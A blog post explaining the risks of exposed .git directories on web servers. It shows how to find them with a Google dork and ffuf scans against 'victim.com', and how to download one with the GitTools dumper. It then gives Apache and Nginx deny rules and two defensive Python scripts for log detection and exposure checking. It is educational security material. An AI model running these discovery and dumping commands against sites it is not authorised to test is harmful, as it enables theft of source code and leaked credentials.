k1ven
Posted on August 23, 2024
What is git?
Git is an open-source, distributed version control system (DVCS) that allows multiple developers to collaborate on a project by tracking changes to files and coordinating work. It enables users to create branches, merge changes, and revert to previous versions, making it a powerful tool for managing codebases of any size. With Git, each developer has a full copy of the repository, ensuring redundancy and enabling offline work. Its widespread adoption is driven by its flexibility, efficiency, and strong community support.
Potential Risks of Exposing a .git Directory
There are numerous risks associated with exposing a .git directory. For example, it can lead to:
Exposure of Sensitive Information: Attackers can access the repository's history, including sensitive keys, credentials, and configuration files that might be stored in the repository. This could result in unauthorized access to other systems and services.
Project Cloning: If the .git directory is exposed, attackers can clone the entire project, gaining access to all the code, including proprietary or confidential information. This can lead to intellectual property theft or misuse.
Commit History Inspection: Attackers can inspect the commit history to find information that might have been accidentally committed, such as API keys, passwords, or other sensitive data that may have been removed but remains in the history.
Reconstruction of Past States: By accessing the .git directory, attackers can reconstruct the project's past states, potentially uncovering vulnerabilities that were fixed in later versions.
Analysis of Development Practices: Attackers can analyze your development practices, including how frequently commits are made, who is making them, and what changes are being implemented. This information can be used in social engineering attacks or to identify weaker points in your security posture.
Potential for Exploiting Security Vulnerabilities: If the source code is exposed, attackers can search for vulnerabilities in the code that might not have been publicly disclosed, increasing the risk of targeted attacks.
How to find an exposed .git?
There are several methods to identify an exposed .git directory. In this section, I will discuss two effective techniques: Google dorks and directory enumeration.
Google Dorks
Google dorks are advanced search queries that use Google's search engine to find specific information that is often hidden or not easily accessible through standard searches. These queries leverage Google's powerful search capabilities to uncover sensitive data, exposed files, or vulnerabilities on websites.
We can locate exposed .git directories using the intext operator.
intext:"Index of /.git"
Directory Enumeration
Directory enumeration is a technique to discover hidden directories and files. This process involves systematically probing a website to identify paths and resources.
There are many automated tools available for directory enumeration. In this example, I will demonstrate how to use the ffuf tool.
ffuf -u https://victim.com/FUZZ -w /path/to/wordlist
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : https://victim.com.br/FUZZ
:: Wordlist : FUZZ: /path/to/wordlist
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
.git [Status: 200, Size: 1923, Words: 20, Lines: 10, Duration: 122ms]
.git/config [Status: 200, Size: 221, Words: 29, Lines: 10, Duration: 92ms]
.git/HEAD [Status: 200, Size: 198, Words: 2, Lines: 10, Duration: 26ms]
If we look at .git/config, we find something like the following (the remote URL is a placeholder for the repository path that appears in the real file):
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[remote "origin"]
url = https://victim.com/<repository>.git
fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
remote = origin
merge = refs/heads/master
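The ffuf output above is exactly what the probing looks like from the server side. As an added example (not part of the original post, and not from ffuf or GitTools), here is a small Python script that scans access logs in combined log format for requests to .git paths and separates blocked probes from requests that were actually served; the log lines are constructed for the example.

```python
import re
from collections import defaultdict

# Combined log format: ip ident user [time] "METHOD path proto" status size
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# A deployed site never needs to serve repository metadata; any request to a
# ".git" path segment is either a scanner probing or a dumper pulling data.
# (Does not match ".gitignore" and similar: a "/" or end of path must follow.)
GIT_PATH = re.compile(r'(^|/)\.git(/|$)')

# Constructed sample log: one client gets served, one client gets blocked.
SAMPLE_LOG = """\
203.0.113.7 - - [23/Aug/2024:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 5120
203.0.113.7 - - [23/Aug/2024:10:01:03 +0000] "GET /.git/HEAD HTTP/1.1" 200 23
203.0.113.7 - - [23/Aug/2024:10:01:03 +0000] "GET /.git/config HTTP/1.1" 200 221
198.51.100.9 - - [23/Aug/2024:10:02:10 +0000] "GET /.git/HEAD HTTP/1.1" 403 199
198.51.100.9 - - [23/Aug/2024:10:02:11 +0000] "GET /app/.git/index HTTP/1.1" 404 153
"""


def find_git_probes(log_text):
    """Return {ip: {"requests": n, "served": n}} for clients touching .git paths.

    "served" counts 2xx responses: cases where the server handed over
    repository data instead of denying the request.
    """
    hits = defaultdict(lambda: {"requests": 0, "served": 0})
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m or not GIT_PATH.search(m.group("path")):
            continue
        entry = hits[m.group("ip")]
        entry["requests"] += 1
        if 200 <= int(m.group("status")) < 300:
            entry["served"] += 1
    return dict(hits)


def exposed_sources(log_text):
    """IPs that received at least one 2xx for a .git path: a leak, not just a scan."""
    return sorted(ip for ip, e in find_git_probes(log_text).items() if e["served"])


if __name__ == "__main__":
    for ip, e in find_git_probes(SAMPLE_LOG).items():
        print(f"{ip}: {e['requests']} .git requests, {e['served']} served")
```

A non-empty result from exposed_sources is the signal to treat the repository history as leaked and rotate any credentials it ever contained, not just to block the client.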
How to get files from .git?
As previously mentioned, we can retrieve various files from the website. To accomplish this efficiently, we will use an automated tool to extract as many files as possible.
GitTools - Dumper
This tool can be used to download as much as possible from a .git repository found on a web server that does not have directory listing enabled.
There is no guarantee that it will completely recover the .git repository; in particular, it may fail if the objects have been compressed into pack files.
Usage:
bash ./gitdumper.py https://victim.com/.git/ output
The dumper only recovers the object store, so we need to check out a version to see the working files. Go to the output folder and execute the following command:
git checkout -- .
How to fix this?
To mitigate this vulnerability, remove the .git folder from your web server or ensure that access to the .git directory is completely denied.
Apache
Update httpd.conf as follows (Apache 2.4 syntax; on Apache 2.2 use "Order deny,allow" followed by "Deny from all" instead of "Require all denied"):
<DirectoryMatch "^/.*/\.git/">
    Require all denied
</DirectoryMatch>
Nginx
If you are using Nginx, add the following instructions to the relevant server block in your nginx.conf file (the dot is escaped so the regex matches the literal ".git" segment):
location ~ /\.git/ {
    deny all;
}
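After deploying either rule, it is worth confirming from the outside that the files a dumper reads first are really no longer served. As an added example (not part of the original post), here is a Python checker that fetches the usual probe paths and reports "exposed" only when a 2xx response actually looks like git metadata; the _fake_fetch stand-in is constructed so the script runs offline.

```python
import sys
import urllib.error
import urllib.request

# Files every .git dumper reads first; if any returns 2xx with git-looking
# content, the deny rule is not in effect for that path.
PROBE_PATHS = ("/.git/HEAD", "/.git/config", "/.git/index")


def http_fetch(url, timeout=5):
    """Fetch url and return (status, first 4 KiB of body); HTTP errors become a status."""
    req = urllib.request.Request(url, headers={"User-Agent": "git-exposure-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read(4096)
    except urllib.error.HTTPError as e:
        return e.code, b""


def looks_like_git_metadata(path, body):
    """HEAD is 'ref: ...' or a 40-hex commit id; config has [core]; index starts 'DIRC'."""
    if path.endswith("/HEAD"):
        return body.startswith(b"ref:") or len(body.strip()) == 40
    if path.endswith("/config"):
        return b"[core]" in body
    return body.startswith(b"DIRC")


def check_git_exposure(base_url, fetch=http_fetch):
    """Return {path: 'exposed' | 'blocked'} for each probe path under base_url.

    A 2xx whose body is not git data (e.g. a catch-all HTML page from a
    rewrite rule) counts as blocked: no repository content reached the client.
    """
    results = {}
    for path in PROBE_PATHS:
        status, body = fetch(base_url.rstrip("/") + path)
        served = 200 <= status < 300 and looks_like_git_metadata(path, body)
        results[path] = "exposed" if served else "blocked"
    return results


def _fake_fetch(url):
    """Constructed stand-in for a server where only /.git/HEAD is still reachable."""
    if url.endswith("/.git/HEAD"):
        return 200, b"ref: refs/heads/master\n"
    return 403, b"<html>Forbidden</html>"


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None  # pass your own site's URL
    res = check_git_exposure(target) if target else check_git_exposure("https://example.invalid", _fake_fetch)
    for p, verdict in res.items():
        print(f"{p}: {verdict}")
```

Run it against your own deployment; a single "exposed" line means the location rule is not covering that path (for example because the repository sits under a subdirectory the pattern does not match).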
Conclusions
This is my first article; I hope you enjoyed it!
Honorable mention to my friend @Duk4s